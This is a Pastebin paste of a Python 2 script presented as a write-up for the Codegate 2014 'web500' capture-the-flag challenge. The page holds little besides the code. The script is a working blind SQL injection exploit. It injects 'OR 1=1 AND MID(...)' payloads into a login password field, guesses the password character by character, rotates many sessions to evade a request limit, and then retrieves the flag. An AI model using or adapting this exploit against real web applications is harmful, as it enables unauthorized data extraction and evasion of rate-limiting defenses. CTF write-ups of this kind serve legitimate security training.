SHARE
TWEET

codegate@2014- web500 writetup

a guest Feb 25th, 2014 443 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. #!/usr/bin/env python
  2. #Blind SQL injection Exploit version 1.0
  3. #Language: Python (2.6)
  4. #Author: gamma95
  5.  
  6. import os
  7. import sys
  8. import urllib2
  9. import struct
  10. import urllib
  11. import time
  12. print """
  13.    Codegate@2014: web500 writeup
  14.    https://twitter.com/xchym
  15.    Usage: python web500.py "http://58.229.183.24/5a520b6b783866fd93f9dcdaf753af08/index.php" "password" "mysql"
  16. """
  17. if len(sys.argv) != 4:
  18.     print "[+] Syntax Error"
  19.     exit()
  20. url = sys.argv[1]
  21. sql = sys.argv[2]
  22. sqlserver = sys.argv[3]
  23.  
  24. def _gen_new_session():
  25.     usock = urllib2.urlopen('http://58.229.183.24/5a520b6b783866fd93f9dcdaf753af08/')
  26.     _cookie = usock.info().get('Set-Cookie')
  27.     return _cookie
  28.  
  29. def _get_flag(_session, _password):
  30.     url = 'http://58.229.183.24/5a520b6b783866fd93f9dcdaf753af08/auth.php'
  31.     user_agent = 'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT)'
  32.     values = {'password':_password}
  33.     headers = { 'User-Agent' : user_agent, 'Cookie': _session }
  34.     data = urllib.urlencode(values)
  35.     req = urllib2.Request(url, data, headers)
  36.     response = urllib2.urlopen(req)
  37.     the_page = response.read()
  38.     return the_page
  39.    
  40. def encodeurl(string):
  41.     return string.replace(' ','%20')
  42.    
  43. def execute(url, sql, sqlserver):
  44.     _list_session=[]
  45.     for line in xrange(0, 40):
  46.         _list_session.append(_gen_new_session())
  47.     lenght = 9999
  48.     if sqlserver =='mysql':
  49.         str1 = " OR 1=1 AND MID("
  50.     else:
  51.         print "[+] argv[4] = mssql or mysql !!! Plz check your input"
  52.         exit()
  53.     result = ""
  54.     dic = ['a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z', '0', '1', '2', '3', '4', '5', '6', '7', '8', '9', '$', '.','-','_','(',')','[',']','{','}','@','=','/','\\','|','#','?','!','<','>']
  55.     count = 0
  56.     check = 0
  57.     for i in range(1, 31):
  58.         user_agent = 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.6) Gecko/20071008 Ubuntu/7.10 (gutsy) Firefox/2.0.0.6'
  59.         kount = 0
  60.         if check == 1:
  61.             break
  62.         for line in dic:
  63.             kount = kount + 1
  64.             flag = 0
  65.             str2 = "," + str(i)+ ")=" + "'" + result + line + "'"
  66.             chuoi = str1 + sql +','+ "1" + str2 + " and '1"
  67.             print chuoi
  68.             values={'password':"123' "+ chuoi}
  69.             data = urllib.urlencode(values)
  70.             #switch to another session for continue bruteforce searching, if not, may be the password will be deleted (over 120 requests limit check)
  71.             headers = { 'Host': '58.229.183.24','User-Agent': user_agent, 'Referer' : url, 'Cookie': _list_session[count]}
  72.             req = urllib2.Request(url, data, headers)
  73.             try:
  74.                 response = urllib2.urlopen(req)
  75.             except:
  76.                 print "[+] Connection error"
  77.                 exit()
  78.             page = response.read()
  79.             len1 = len(page)
  80.             if "True" in page:
  81.                 count = count + 1
  82.                 result = result + line
  83.                 print result
  84.                 flag = 1
  85.                 break #
  86.             elif kount == len(dic):
  87.                 check = 1
  88.                 break
  89.             else:
  90.                 continue
  91.     print "[+]Done, The password is: " + str(result)
  92.     print "[+]Flag: " + _get_flag(_list_session[count], str(result))
  93.     ##############
  94.  
  95. if True:
  96.    
  97.     print """
  98.    [+] Sending Malicious Request
  99.    [+] Plz wait ... :)
  100.                """
  101.                
  102.     execute(url, sql, sqlserver)
  103. else:
  104.     print "Not vul"
  105.     exit()
  106. exit()
RAW Paste Data
Top